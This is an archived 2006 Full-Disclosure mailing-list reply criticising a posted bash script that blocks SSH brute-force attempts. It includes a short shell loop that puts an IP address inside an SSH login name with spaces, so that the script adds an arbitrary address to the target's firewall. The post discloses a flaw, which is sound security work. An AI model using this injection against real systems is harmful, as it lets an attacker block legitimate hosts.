Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- From: "Gary Leons" <tastytastybeef@xxxxxxxxxxxxxx>
- Date: Tue, 28 Feb 2006 22:52:52 +0100
On 2/28/06, GroundZero Security <fd@xxxxxxx> wrote:
Hello,
i made a small bash script last year to block those bruteforce attempts automatically via the firewall.
In case someone is interested, i released it on our website. Someone may have a use for it :-)
http://www.groundzero-security.com/code/bruteforce-block.sh
Have a nice day everyone!
-sk
That is remarkably shoddy coding from a "security research and
software developer".
*NEWS FLASH* most platforms allow login names to contain spaces.
$ for ((i=0;i<5;i++));
do ssh -l "j00 ar3 l4m3 222.173.190.239" idiot.running.this.script.com
done
And i just added an arbitrary address to your firewall, fun!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Follow-Ups:
- Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- From: GroundZero Security
- Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- References:
- Prev by Date: Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- Next by Date: Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
- Previous by thread: Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- Next by thread: Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
- Index(es):
Relevant Pages
|
|
